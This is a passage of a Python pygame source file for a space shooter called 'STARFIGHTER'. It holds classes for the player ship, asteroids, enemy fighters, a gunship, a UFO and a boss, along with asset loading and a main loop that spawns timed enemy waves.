spriteGroup.add(m)\n \n# Shield bar\ndef draw_shield_bar(surf, x, y, pct):\n if pct < 0:\n pct = 0\n BAR_LENGTH = 200\n BAR_HEIGHT = 10\n fill = (pct / 100) * BAR_LENGTH\n outlineRect = pygame.Rect(x, y, BAR_LENGTH, BAR_HEIGHT)\n fillRect = pygame.Rect(x, y, fill, BAR_HEIGHT)\n pygame.draw.rect(surf, GREEN, fillRect)\n pygame.draw.rect(surf, WHITE, outlineRect, 2)\n\n# Player lives\ndef draw_lives(surf, x, y, lives, img):\n for i in range(lives):\n imgRect = img.get_rect()\n imgRect.x = x + 30 * i\n imgRect.y = y\n surf.blit(img, imgRect)\n \n# Player sprite\nclass Player(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = playerImg \n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width * 0.75 / 2)\n self.rect.centerx = (WIDTH/2)\n self.rect.bottom = HEIGHT - 100\n self.speedx = 0\n self.speedy = 0\n self.shootDelay = 250\n self.lastShot = pygame.time.get_ticks()\n self.shield = 100\n self.lives = 3\n self.hidden = False\n self.hideTimer = pygame.time.get_ticks()\n self.power = 1\n self.powertime = pygame.time.get_ticks()\n \n def update(self):\n # powerup timeout\n if self.power >= 2 and pygame.time.get_ticks() - self.powertime > POWERUP_TIME:\n self.power = 1\n self.powertime = pygame.time.get_ticks()\n \n if self.hidden and pygame.time.get_ticks() - self.hideTimer > 2000:\n self.hidden = False\n self.rect.centerx = WIDTH / 2\n self.rect.bottom = HEIGHT - 100\n \n self.speedx = 0\n self.speedy = 0\n key = pygame.key.get_pressed()\n \n # Player controls/Movement\n if key[pygame.K_a]:\n self.speedx = -PSPEED\n if key[pygame.K_d]:\n self.speedx = PSPEED\n if key[pygame.K_w] and self.rect.top < HEIGHT+50:\n self.speedy = -PSPEED\n if key[pygame.K_s] and self.rect.top < HEIGHT+50:\n self.speedy = PSPEED\n if key[pygame.K_SPACE] and self.rect.top < HEIGHT + 50:\n self.shoot() \n self.rect.x += self.speedx\n self.rect.y += self.speedy\n \n # Player boundaries\n if self.rect.right > WIDTH:\n self.rect.right = WIDTH\n if self.rect.left < 0:\n self.rect.left = 0\n if self.rect.bottom > HEIGHT and self.hidden != True:\n self.rect.bottom = HEIGHT\n if self.rect.top < HEIGHT - 350:\n self.rect.top = HEIGHT - 350\n \n def powerup(self):\n self.power += 1\n self.powertime = pygame.time.get_ticks()\n \n def shoot(self):\n now = pygame.time.get_ticks()\n if now - self.lastShot > self.shootDelay:\n self.lastShot = now\n if self.power == 1:\n bullet = Bullet(self.rect.centerx, self.rect.top, blueBulletImg)\n allSprites.add(bullet)\n bullets.add(bullet)\n laser1.play()\n if self.power == 2:\n bullet1 = Bullet(self.rect.left+2, self.rect.top+6, blueBulletImg)\n bullet2 = Bullet(self.rect.right-2, self.rect.top+6, blueBulletImg)\n allSprites.add(bullet1)\n allSprites.add(bullet2)\n bullets.add(bullet1)\n bullets.add(bullet2)\n laser1.play()\n if self.power >= 3:\n bullet1 = Bullet(self.rect.left+2, self.rect.top+6, blueBulletImg)\n bullet2 = Bullet(self.rect.right-2, self.rect.top+6, blueBulletImg)\n bullet3 = Bullet(self.rect.centerx, self.rect.top, blueBulletImg)\n bullet1.speedx = -3\n bullet2.speedx = 3\n allSprites.add(bullet1)\n allSprites.add(bullet2)\n allSprites.add(bullet3)\n bullets.add(bullet1)\n bullets.add(bullet2)\n bullets.add(bullet3)\n laser1.play() \n \n # Temporarily hides player\n def hide(self):\n self.hidden = True\n self.power = 1\n self.hideTimer = pygame.time.get_ticks()\n self.rect.centerx= WIDTH/2\n self.rect.bottom = HEIGHT + 200\n \n# Enemy sprites\n\n# Asteroids\nclass Asteroid(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.imageOrig = random.choice(meteorImg)\n self.imageOrig.set_colorkey(BLACK)\n self.image = self.imageOrig.copy()\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width * 0.85 / 2)\n self.rect.x = random.randrange((WIDTH+50) - (self.rect.width-50))\n self.rect.y = random.randrange(-350,-250)\n self.speedy = random.randrange(3,5)\n self.speedx = random.randrange(-3,3)\n self.rot = 0\n self.rotSpeed = random.randrange(-8,8)\n self.lastUpdate = pygame.time.get_ticks() \n \n def rotate(self):\n now = pygame.time.get_ticks()\n if now - self.lastUpdate > 50:\n self.lastUpdate = now\n self.rot = (self.rot + self.rotSpeed) % 360\n newImage = pygame.transform.rotate(self.imageOrig, self.rot)\n oldCenter = self.rect.center\n self.image = newImage\n self.rect = self.image.get_rect()\n self.rect.center = oldCenter\n \n def update(self):\n self.rotate()\n self.rect.x += self.speedx\n self.rect.y += self.speedy\n if self.rect.top > HEIGHT + 10 or self.rect.left < -150 or self.rect.right > WIDTH + 150:\n self.rect.x = random.randrange(WIDTH - self.rect.width)\n self.rect.y = random.randrange(-100,-40)\n self.speedy = random.randrange(1,5)\n \n \n# Enemy starfighter\nclass EnemyFighter(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = random.choice(fighterImg)\n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width * 0.85 /2)\n self.rect.x = random.randrange(100,600)\n self.rect.y = random.randrange(-350,-250)\n self.speedy = random.randrange(3,7)\n self.speedx = random.randrange(-5,5)\n self.dive = random.random()\n self.lowerBound = random.randrange(300,450)\n self.upperBound = random.randrange(150,200)\n self.diveSound = False\n self.lastShot = pygame.time.get_ticks()\n self.shootDelay = random.randrange(500,1500) \n \n def shoot(self):\n now = pygame.time.get_ticks()\n if now - self.lastShot > self.shootDelay:\n self.lastShot = now\n self.shootDelay = random.randrange(500,1500)\n bullet = Bullet(self.rect.centerx, self.rect.bottom,redBulletImg)\n bullet.speedy = 6\n bullet.rect.top = self.rect.bottom\n eBullets.add(bullet)\n laser2.play() \n \n def update(self):\n # Randomizes for dive\n if self.dive > 0.7:\n self.rect.x += 0\n self.rect.y += 15\n if self.diveSound == False:\n flyby.play()\n self.diveSound = True\n \n # Fighter movement\n elif self.dive < 0.7:\n self.rect.x += self.speedx\n self.rect.y += self.speedy\n if self.rect.bottom > self.lowerBound and self.speedy >= 0:\n self.speedy = -self.speedy\n self.speedx = random.randrange(-5, 5)\n self.upperBound = random.randrange(50,200)\n if self.rect.top < self.upperBound and self.speedy <= 0:\n self.speedy = abs(self.speedy)\n self.speedx = random.randrange(-5, 5)\n self.lowerBound = random.randrange(300,450)\n self.shoot()\n \n # Fighter boundaries\n if self.rect.left <= 0:\n self.rect.left == 0\n self.speedx = abs(self.speedx)\n if self.rect.right >= WIDTH:\n self.rect.right == 0\n self.speedx = -self.speedx\n if self.rect.bottom > HEIGHT + 50:\n self.rect.x = random.randrange(100,600)\n self.rect.y = random.randrange(-100, -40)\n self.speedy = random.randrange(3, 7)\n self.speedx = random.randrange(-5, 5)\n self.dive = random.random()\n self.lowerBound = random.randrange(300,450)\n self.upperBound = random.randrange(150,200)\n\n\n# Enemy Gunship\nclass Gunship(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = gunshipImg\n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width * 0.85 /2)\n self.rect.x = random.randrange(50,600)\n self.rect.y = -500\n self.speedy = 2\n self.speedx = 0\n self.lastShot = pygame.time.get_ticks()\n self.emptyClip = pygame.time.get_ticks()\n self.shootDelay = 400\n self.clipSize = 12\n self.clipReload = 3000\n self.health = 5\n \n def shoot(self):\n now = pygame.time.get_ticks()\n if now - self.lastShot > self.shootDelay and self.rect.bottom > 20 and self.clipSize > 0:\n self.lastShot = now\n bullet1 = Bullet(self.rect.left, self.rect.bottom, greenBulletImg)\n bullet2 = Bullet(self.rect.right, self.rect.bottom, greenBulletImg)\n bullet2.speedy = 6\n bullet1.speedy = 6\n bullet1.rect.top = self.rect.bottom\n bullet2.rect.top = self.rect.bottom\n self.clipSize -= 1\n eBullets.add(bullet1)\n eBullets.add(bullet2)\n laser3.play()\n if self.clipSize == 0:\n self.emptyClip = pygame.time.get_ticks()\n self.clipSize = -1\n if now - self.emptyClip > self.clipReload and self.clipSize == -1:\n self.clipSize = 12\n \n def update(self):\n # Gunship movement\n self.rect.x += self.speedx\n self.rect.y += self.speedy\n if self.rect.top > 100 and self.speedy == 2:\n self.speedy = 0\n self.speedx = random.choice((-3,3))\n self.shoot()\n \n # Gunship boundaries\n if self.rect.left < 0:\n self.rect.left = 0\n self.speedx = abs(self.speedx)\n if self.rect.right > WIDTH:\n self.rect.right = WIDTH\n self.speedx = -self.speedx\n\n# Enemy UFO\nclass UFO(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.imageOrig = ufoImg\n self.imageOrig.set_colorkey(BLACK)\n self.image = self.imageOrig.copy()\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width / 2)\n self.rect.x = random.randrange(50,600)\n self.rect.y = -300\n self.speedy = 3\n self.rot = 0\n self.rotSpeed = 10\n self.health = 4\n self.shootDelay = 1200\n self.lastUpdate = pygame.time.get_ticks()\n self.lastShot = pygame.time.get_ticks()\n \n def rotate(self):\n now = pygame.time.get_ticks()\n if now - self.lastUpdate > 50:\n self.lastUpdate = now\n self.rot = (self.rot + self.rotSpeed) % 360\n newImage = pygame.transform.rotate(self.imageOrig, self.rot)\n oldCenter = self.rect.center\n self.image = newImage\n self.rect = self.image.get_rect()\n self.rect.center = oldCenter\n \n def gun(self, x, y):\n bullet = Bullet(self.rect.centerx, self.rect.centerx, greenBulletImg)\n bullet.speedx = x\n bullet.speedy = y\n bullet.rect.top = self.rect.bottom\n allSprites.add(bullet)\n eBullets.add(bullet)\n \n def shoot(self):\n now = pygame.time.get_ticks()\n if now - self.lastShot > self.shootDelay and self.rect.bottom > 20:\n self.lastShot = now\n self.gun(0, 2)\n self.gun(-2, 2)\n self.gun(2, 2)\n self.gun(-1, 2)\n self.gun(1, 2)\n laser3.play() \n \n def update(self):\n self.rotate()\n self.rect.y += self.speedy\n if self.rect.top > 300 and self.speedy >= 0:\n self.speedy = -2\n if self.rect.bottom < 200 and self.speedy <= 0:\n self.speedy = 2\n self.shoot()\n \n\n# Enemy Boss\nclass Boss(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.imageOrig = bossImg\n self.imageOrig.set_colorkey(RED)\n self.image = self.imageOrig\n self.rect = self.image.get_rect()\n self.dam_image = bossDamagedImg\n self.dam_image.set_colorkey(RED)\n self.radius = int(self.rect.width * 0.55 / 2)\n self.rect.centerx = WIDTH / 2\n self.rect.y = -500\n self.speedy = 2\n self.speedx = 0\n self.health = 400\n self.damaged = False\n self.damTimer = pygame.time.get_ticks()\n self.alarm = 1\n \n # Side guns\n self.sideGun_lastShot = pygame.time.get_ticks()\n self.sideGun_empty = pygame.time.get_ticks()\n self.sideGun_shootDelay = 100\n self.sideGun_clipSize = 30\n self.sideGun_reload = 3000\n \n # Torpedoes\n self.torpedo_lastShot = pygame.time.get_ticks()\n self.torpedo_empty = pygame.time.get_ticks()\n self.torpedo_shootDelay = 4000\n \n # AA guns\n self.aaGun_lastShot = pygame.time.get_ticks()\n self.aaGun_empty = pygame.time.get_ticks()\n self.aaGun_shootDelay = 600\n self.aaGun_reload = random.randrange(1500,2500)\n self.aaGun_clipSize = 3\n \n # Rotary gun\n self.rotary_lastShot = pygame.time.get_ticks()\n self.rotary_empty = pygame.time.get_ticks()\n self.rotary_shootDelay = 450\n self.rotary_clipSize = 20\n self.rotary_reload = 3000\n self.x = 0\n self.y = 5\n self.gun = 1\n \n # Side Guns \n def SideGuns(self, x):\n ray = Bullet(x, self.rect.bottom, sideBulletImg)\n ray.speedy = 10\n ray.rotSpeed = 0\n ray.rect.top = self.rect.bottom-60\n eBullets.add(ray)\n \n # Torpedoes\n def Torpedoes(self, x, y, b):\n torpedo = Bullet(b, self.rect.bottom, blueBulletOrigImg)\n torpedo.speedx = x\n torpedo.speedy = y \n torpedo.rotSpeed = 4\n torpedo.rect.top = self.rect.bottom-200\n eBullets.add(torpedo)\n \n # AA guns\n def AAGuns(self, x, y):\n aaGun = Bullet(x, self.rect.bottom, aaBulletImg)\n aaGun.speedy = 5\n aaGun.rotSpeed = 0\n aaGun.rect.top = y\n eBullets.add(aaGun)\n \n # Rotary gun\n def RotaryGun(self, x, y, b):\n rotary = Bullet(b, self.rect.bottom, redBulletImg)\n rotary.speedx = x\n rotary.speedy = y\n rotary.rect.top = self.rect.top+150\n eBullets.add(rotary) \n\n def shoot(self):\n now = pygame.time.get_ticks()\n \n # Side guns\n if now - self.sideGun_lastShot > self.sideGun_shootDelay and self.sideGun_clipSize > 0:\n self.sideGun_lastShot = now\n self.SideGuns(self.rect.left + 60)\n self.SideGuns(self.rect.right - 60)\n self.sideGun_clipSize -= 1\n if self.sideGun_clipSize == 0:\n self.sideGun_empty = pygame.time.get_ticks()\n self.sideGun_clipSize = -1\n if now - self.sideGun_empty > self.sideGun_reload and self.sideGun_clipSize == -1:\n self.sideGun_clipSize = 40\n \n # Phases\n if self.health <= 350 and self.alarm == 1:\n alarm.play()\n self.alarm = 2 \n if self.health <= 250 and self.alarm == 2:\n alarm.play()\n self.alarm = 3\n if self.health <= 150 and self.alarm == 3:\n alarm.play()\n self.alarm = 4\n if self.health <= 50 and self.alarm == 4:\n alarm.play()\n self.alarm = 5\n \n # Torpedoes\n if now - self.torpedo_lastShot > self.torpedo_shootDelay and self.health < 350:\n self.torpedo_lastShot = now\n self.Torpedoes(0, 3, self.rect.centerx)\n self.Torpedoes(-1, 3, self.rect.centerx-25)\n self.Torpedoes(1, 3, self.rect.centerx+25)\n self.Torpedoes(2, 2.8, self.rect.centerx+50)\n self.Torpedoes(-2, 2.8, self.rect.centerx-50)\n \n # AA guns\n if now - self.aaGun_lastShot > self.aaGun_shootDelay and self.aaGun_clipSize > 0:\n self.aaGun_lastShot = now\n self.aaGun_clipSize -= 1\n self.AAGuns(self.rect.centerx-95, self.rect.bottom-50)\n self.AAGuns(self.rect.centerx-130, self.rect.bottom-100)\n self.AAGuns(self.rect.centerx+95, self.rect.bottom-50)\n self.AAGuns(self.rect.centerx+130, self.rect.bottom-100)\n laser3.play()\n if self.aaGun_clipSize == 0:\n self.aaGun_empty = pygame.time.get_ticks()\n self.aaGun_clipSize = -1\n if now - self.aaGun_empty > self.aaGun_reload and self.aaGun_clipSize == -1:\n self.aaGun_clipSize = 3\n self.aaGun_reload = random.randrange(1500,2500)\n \n # Rotary Gun\n if now - self.rotary_lastShot > self.rotary_shootDelay and self.rotary_clipSize > 0 and self.health < 250:\n self.rotary_lastShot = now\n self.rotary_clipSize -= 1\n if self.y == 5 and self.x == 0 and self.gun == 1:\n self.RotaryGun(self.x, self.y, self.rect.centerx+10)\n self.RotaryGun(self.x, self.y, self.rect.centerx-10)\n self.y = 4\n self.x = 1\n self.gun = 2\n elif self.y == 4 and self.gun == 2:\n self.RotaryGun(self.x, self.y, self.rect.centerx+10)\n self.RotaryGun(self.x, self.y, self.rect.centerx-10)\n self.y = 3\n self.x = 2\n self.gun = 3\n elif self.y == 3 and self.gun == 3:\n self.RotaryGun(self.x, self.y, self.rect.centerx+10)\n self.RotaryGun(self.x, self.y, self.rect.centerx-10)\n self.y = 4\n self.x = 1\n self.gun = 4\n elif self.y == 4 and self.gun == 4:\n self.RotaryGun(self.x, self.y, self.rect.centerx+10)\n self.RotaryGun(self.x, self.y, self.rect.centerx-10)\n self.y = 5\n self.x = 0\n self.gun = 5\n elif self.y == 5 and self.gun == 5:\n self.RotaryGun(self.x, self.y, self.rect.centerx+10)\n self.RotaryGun(self.x, self.y, self.rect.centerx-10)\n self.y = 4\n self.x = -1\n self.gun = 6\n elif self.y == 4 and self.gun == 6:\n self.RotaryGun(self.x, self.y, self.rect.centerx+10)\n self.RotaryGun(self.x, self.y, self.rect.centerx-10)\n self.y = 3\n self.x = -2\n self.gun = 7\n elif self.y == 3 and self.gun == 7:\n self.RotaryGun(self.x, self.y, self.rect.centerx+10)\n self.RotaryGun(self.x, self.y, self.rect.centerx-10)\n self.y = 4\n self.x = -1\n self.gun = 8\n elif self.y == 4 and self.gun == 8:\n self.RotaryGun(self.x, self.y, self.rect.centerx+10)\n self.RotaryGun(self.x, self.y, self.rect.centerx-10)\n self.y = 5\n self.x = 0\n self.gun = 1\n laser2.play()\n if self.rotary_clipSize == 0:\n self.rotary_empty = pygame.time.get_ticks()\n self.rotary_clipSize = -1\n if now - self.rotary_empty> self.rotary_reload and self.rotary_clipSize == -1:\n self.rotary_clipSize = 20\n \n def update(self):\n # Damage animation\n if self.damaged == True:\n self.damaged = False\n self.damTimer = pygame.time.get_ticks()\n self.image = self.dam_image\n if self.damaged == False and pygame.time.get_ticks() - self.damTimer > 50:\n self.image = self.imageOrig\n \n # Boss movement\n self.rect.x += self.speedx\n self.rect.y += self.speedy\n if self.rect.top > 25 and self.speedy == 2:\n self.speedy = 0\n self.speedx = random.choice((-1,1))\n \n # Shoot if entered stage\n if self.speedy == 0:\n self.shoot()\n \n # Boss boundaries\n if self.rect.left < 0:\n self.rect.left = 0\n self.speedx = abs(self.speedx)\n if self.rect.right > WIDTH:\n self.rect.right = WIDTH\n self.speedx = -self.speedx\n \n \n# Bullets\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, x, y, img):\n pygame.sprite.Sprite.__init__(self)\n self.imageOrig = img\n self.imageOrig.set_colorkey(BLACK)\n self.image = self.imageOrig.copy()\n self.rect = self.image.get_rect()\n self.rect.bottom = y\n self.rect.centerx = x\n self.speedx = 0.0\n self.speedy = -10.0\n self.radius = 10\n self.rot = 0\n self.rotSpeed = -20\n self.lastUpdate = pygame.time.get_ticks() \n \n def rotate(self):\n now = pygame.time.get_ticks()\n if now - self.lastUpdate > 50:\n self.lastUpdate = now\n self.rot = (self.rot + self.rotSpeed) % 360\n newImage = pygame.transform.rotate(self.imageOrig, self.rot)\n oldCenter = self.rect.center\n self.image = newImage\n self.rect = self.image.get_rect()\n self.rect.center = oldCenter \n \n def update(self):\n self.rotate()\n self.rect.y += self.speedy\n self.rect.x += self.speedx\n \n # Deletes bullet if it leaves screen\n if self.rect.bottom < 0:\n self.kill()\n if self.rect.top > HEIGHT:\n self.kill()\n if self.rect.right < 0:\n self.kill()\n if self.rect.left > WIDTH:\n self.kill()\n\n \n# Power Ups \nclass PowerUp(pygame.sprite.Sprite):\n def __init__(self, center):\n pygame.sprite.Sprite.__init__(self)\n self.type = random.choice([\"shield\", \"gun\"])\n self.image = powerUpImg[self.type]\n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.rect.center = center\n self.speedy = 3\n \n def update(self):\n self.rect.y += self.speedy\n \n # Deletes power up if it leaves screen\n if self.rect.top > HEIGHT:\n self.kill()\n \n \n# Explosions\nclass Explosion(pygame.sprite.Sprite):\n def __init__(self, center, size):\n pygame.sprite.Sprite.__init__(self)\n self.size = size\n self.image = explosionAnim[self.size][0]\n self.rect = self.image.get_rect()\n self.rect.center = center\n self.frame = 0\n self.lastUpdate = pygame.time.get_ticks()\n self.frameRate = 75 \n \n def update(self):\n now = pygame.time.get_ticks()\n if now - self.lastUpdate > self.frameRate:\n self.lastUpdate = now\n self.frame += 1\n if self.frame == len(explosionAnim[self.size]):\n self.kill()\n else:\n center = self.rect.center\n self.image = explosionAnim[self.size][self.frame]\n self.rect = self.image.get_rect()\n self.rect.center = center\n \n\n# Plays Game Over Screen\ndef show_gameover_screen():\n pygame.mixer.music.stop()\n screen.blit(background, (0,0))\n draw_text(screen, \"STARFIGHTER\", 64, WIDTH / 2, HEIGHT / 4)\n draw_text(screen, \"WASD keys to move, Space to fire\", 22, WIDTH / 2, HEIGHT / 2)\n draw_text(screen, \"Press the ESC key to begin...\", 18, WIDTH /2 , HEIGHT * 3 / 4)\n pygame.display.flip()\n waiting = True\n while waiting:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n waiting = False\n \n\n# Load all graphics\nbackground = pygame.image.load(os.path.join(imgFolder, \"back.png\")).convert()\nbackground = pygame.transform.scale(background, (WIDTH,HEIGHT+5))\nplayerImg = pygame.image.load(os.path.join(imgFolder, \"playerShip2_green.png\")).convert()\nplayerImg = pygame.transform.scale(playerImg, (56, 37))\nplayerMiniImg = pygame.transform.scale(playerImg, (28, 19))\nplayerMiniImg.set_colorkey(BLACK)\nblueBulletOrigImg = pygame.image.load(os.path.join(imgFolder, \"laserBlue08.png\")).convert()\nblueBulletImg = pygame.transform.scale(blueBulletOrigImg, (20,20))\ngreenBulletImg = pygame.image.load(os.path.join(imgFolder, \"laserGreen14.png\")).convert()\ngreenBulletImg = pygame.transform.scale(greenBulletImg, (20,20))\nredBulletImg = pygame.image.load(os.path.join(imgFolder, \"laserRed08.png\")).convert()\nredBulletImg = pygame.transform.scale(redBulletImg, (20,20))\nsideBulletImg = pygame.image.load(os.path.join(imgFolder, \"laserGreen10.png\")).convert()\naaBulletImg = pygame.image.load(os.path.join(imgFolder, \"laserRed16.png\")).convert()\nufoImg = pygame.image.load(os.path.join(imgFolder, \"ufoRed.png\")).convert()\nufoImg = pygame.transform.scale(ufoImg, (110,110))\ngunshipImg = pygame.image.load(os.path.join(imgFolder, \"enemyRed4.png\")).convert()\ngunshipImg = pygame.transform.scale(gunshipImg, (103,105))\nbossImg = pygame.image.load(os.path.join(imgFolder, \"boss.png\")).convert()\nbossImg = pygame.transform.scale(bossImg, (524, 408))\nbossDamagedImg = pygame.image.load(os.path.join(imgFolder, \"boss_damaged.png\")).convert()\nbossDamagedImg = pygame.transform.scale(bossDamagedImg, (524, 408))\n\nfighterImg = []\nfighterList = [\"enemyBlack1.png\", \"enemyBlack2.png\", \"enemyBlack3.png\"]\nfor img in fighterList:\n f = pygame.image.load(os.path.join(imgFolder, img)).convert()\n f = pygame.transform.scale(f, (56,37))\n fighterImg.append(f) \n \nmeteorImg = []\nmeteorList = [\"meteorBrown_big1.png\", \"meteorBrown_big2.png\", \"meteorBrown_big3.png\", \"meteorBrown_big4.png\",\n \"meteorBrown_med1.png\", \"meteorBrown_med2.png\", \"meteorBrown_small1.png\",\n \"meteorBrown_small2.png\", \"meteorBrown_tiny1.png\", \"meteorBrown_tiny2.png\"]\nfor img in meteorList:\n meteorImg.append(pygame.image.load(os.path.join(imgFolder, img)).convert())\n \nexplosionAnim = {}\nexplosionAnim[\"lg\"] = []\nexplosionAnim[\"sm\"] = []\nexplosionAnim[\"nuke\"] = []\nfor i in range(9):\n filename = \"regularExplosion0{}.png\".format(i)\n img = pygame.image.load(os.path.join(imgFolder, filename)).convert()\n img.set_colorkey(BLACK)\n imgLg = pygame.transform.scale(img, (75,75))\n explosionAnim[\"lg\"].append(imgLg)\n imgSm = pygame.transform.scale(img, (32,32))\n explosionAnim[\"sm\"].append(imgSm)\n filename = \"sonicExplosion0{}.png\".format(i)\n img = pygame.image.load(os.path.join(imgFolder, filename)).convert()\n img.set_colorkey(BLACK)\n explosionAnim[\"nuke\"].append(img)\n\npowerUpImg = {}\npowerUpImg[\"shield\"] = pygame.image.load(os.path.join(imgFolder, \"shield_gold.png\")).convert()\npowerUpImg[\"gun\"] = pygame.image.load(os.path.join(imgFolder, \"bolt_gold.png\")).convert()\n \n# Load all sounds\nlaser1 = pygame.mixer.Sound(os.path.join(sndFolder, \"Laser_Shoot.wav\"))\nlaser1.set_volume(0.2)\nlaser2 = pygame.mixer.Sound(os.path.join(sndFolder, \"Enemy_Shoot.wav\"))\nlaser2.set_volume(0.2)\nlaser3 = pygame.mixer.Sound(os.path.join(sndFolder, \"Gunship_Shoot.wav\"))\nlaser3.set_volume(0.2)\ndam = pygame.mixer.Sound(os.path.join(sndFolder, \"Hit.wav\"))\ndam.set_volume(0.6)\nboom = pygame.mixer.Sound(os.path.join(sndFolder, \"rumble1.ogg\"))\nboom.set_volume(0.6)\nlaserPower = pygame.mixer.Sound(os.path.join(sndFolder, \"laser_power.wav\"))\nlaserPower.set_volume(0.6)\nshieldPower = pygame.mixer.Sound(os.path.join(sndFolder, \"shield_power.wav\"))\nshieldPower.set_volume(0.6)\nexplosionSnds = []\nexpList = [\"Explosion1.wav\", \"Explosion2.wav\", \"Explosion3.wav\"]\nflyby = pygame.mixer.Sound(os.path.join(sndFolder, \"flyby.wav\"))\nflyby.set_volume(0.4)\nalarm = pygame.mixer.Sound(os.path.join(sndFolder, \"RedAlert.wav\"))\nfor snd in expList:\n container = pygame.mixer.Sound(os.path.join(sndFolder, snd))\n container.set_volume(0.4)\n explosionSnds.append(container)\n\n\n# Game Loop\nrunning = True \ngame_over = True\n\nwhile running:\n if game_over:\n show_gameover_screen()\n boss_killed = False\n\n # Initialize all sprite groups\n player = Player()\n mobs = pygame.sprite.Group()\n fighter = pygame.sprite.Group()\n gunship = pygame.sprite.Group()\n ufo = pygame.sprite.Group()\n bullets = pygame.sprite.Group()\n eBullets = pygame.sprite.Group()\n powerUps = pygame.sprite.Group()\n boss = pygame.sprite.Group()\n allSprites = pygame.sprite.Group()\n allSprites.add(player)\n \n # Initialize User Events\n game_start = pygame.USEREVENT + 0\n meteor_wave = pygame.USEREVENT + 1\n fighter_wave = pygame.USEREVENT + 2\n new_music = pygame.USEREVENT + 3\n ufo_wave = pygame.USEREVENT + 4\n gunship_wave = pygame.USEREVENT + 5\n alert = pygame.USEREVENT + 6\n boss_wave = pygame.USEREVENT + 7\n \n pygame.time.set_timer(game_start, 1)\n pygame.time.set_timer(meteor_wave, 4000)\n pygame.time.set_timer(fighter_wave, 22000)\n pygame.time.set_timer(new_music, 44500)\n pygame.time.set_timer(ufo_wave, 46000)\n pygame.time.set_timer(gunship_wave, 85000)\n pygame.time.set_timer(alert, 145000)\n pygame.time.set_timer(boss_wave, 151000)\n\n score = 0\n x = 0\n x1 = 0\n y = 0\n y1 = -HEIGHT\n support = False\n game_over = False\n\n clock.tick(FPS) \n \n # Process input (events)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN and boss_killed == True:\n if event.key == pygame.K_ESCAPE:\n game_over = True \n if event.type == game_start:\n pygame.mixer.music.load(os.path.join(sndFolder, \"Battle.ogg\"))\n pygame.mixer.music.set_volume(1)\n pygame.mixer.music.play(-1)\n pygame.time.set_timer(game_start, 0)\n if event.type == meteor_wave:\n for i in range(15):\n new_mob(Asteroid,mobs)\n pygame.time.set_timer(meteor_wave, 0)\n if event.type == fighter_wave:\n if support == False:\n for i in range(3):\n new_mob(EnemyFighter,fighter)\n pygame.time.set_timer(fighter_wave, 2000)\n if support == True and len(fighter) < 3:\n for i in range(2):\n new_mob(EnemyFighter,fighter)\n pygame.time.set_timer(fighter_wave, 5000)\n if event.type == new_music:\n pygame.mixer.music.load(os.path.join(sndFolder, \"Battle dirty.ogg\"))\n pygame.mixer.music.set_volume(1)\n pygame.mixer.music.play(-1)\n pygame.time.set_timer(new_music, 0)\n if event.type == ufo_wave:\n if len(ufo) < 2:\n new_mob(UFO, ufo)\n pygame.time.set_timer(ufo_wave, 6500)\n pygame.time.set_timer(fighter_wave, 3000)\n if event.type == gunship_wave: \n if len(gunship) == 0:\n new_mob(Gunship,gunship)\n pygame.time.set_timer(fighter_wave, 4000)\n pygame.time.set_timer(ufo_wave, 4000)\n pygame.time.set_timer(gunship_wave, 8000)\n if event.type == alert:\n pygame.mixer.music.stop()\n pygame.time.set_timer(fighter_wave, 15000)\n pygame.time.set_timer(ufo_wave, 0)\n pygame.time.set_timer(gunship_wave, 0)\n pygame.time.set_timer(alert, 0)\n for enemy in fighter:\n expl = Explosion(enemy.rect.center, 'lg')\n allSprites.add(expl)\n enemy.kill()\n for enemy in gunship:\n expl = Explosion(enemy.rect.center, 'lg')\n allSprites.add(expl)\n enemy.kill()\n for enemy in ufo:\n expl = Explosion(enemy.rect.center, 'lg')\n allSprites.add(expl)\n enemy.kill()\n boom.play()\n alarm.play()\n if event.type == boss_wave:\n support = True\n pygame.time.set_timer(ufo_wave, 0)\n pygame.time.set_timer(gunship_wave, 0)\n pygame.mixer.music.load(os.path.join(sndFolder, \"CPU_Showdown.mp3\"))\n pygame.mixer.music.set_volume(1)\n pygame.mixer.music.play(-1)\n new_mob(Boss, boss)\n pygame.time.set_timer(boss_wave, 0)\n\n # Update\n allSprites.update()\n eBullets.update()\n\n # Check for bullet collisions\n hits = pygame.sprite.groupcollide(mobs, bullets, True, True, pygame.sprite.collide_circle)\n for hit in hits:\n random.choice(explosionSnds).play()\n if hit.radius < 15 and hit.radius:\n score += 75\n elif hit.radius > 15 and hit.radius < 30:\n score += 50\n elif hit.radius > 30:\n score += 25\n expl = Explosion(hit.rect.center, 'lg')\n allSprites.add(expl)\n if random.random() > 0.90:\n pow = PowerUp(hit.rect.center)\n allSprites.add(pow)\n powerUps.add(pow) \n new_mob(Asteroid,mobs)\n\n hits = pygame.sprite.groupcollide(fighter, bullets, True, True)\n for hit in hits:\n random.choice(explosionSnds).play()\n score += 150\n expl = Explosion(hit.rect.center, 'lg')\n allSprites.add(expl)\n\n hits = pygame.sprite.groupcollide(gunship, bullets, False, True)\n for hit in hits:\n dam.play()\n expl = Explosion(hit.rect.center, 'sm')\n allSprites.add(expl)\n hit.health -= 1\n if hit.health == 0:\n hit.kill()\n boom.play()\n score += 300\n expl = Explosion(hit.rect.center, 'lg')\n allSprites.add(expl)\n \n hits = pygame.sprite.groupcollide(ufo, bullets, False, True, 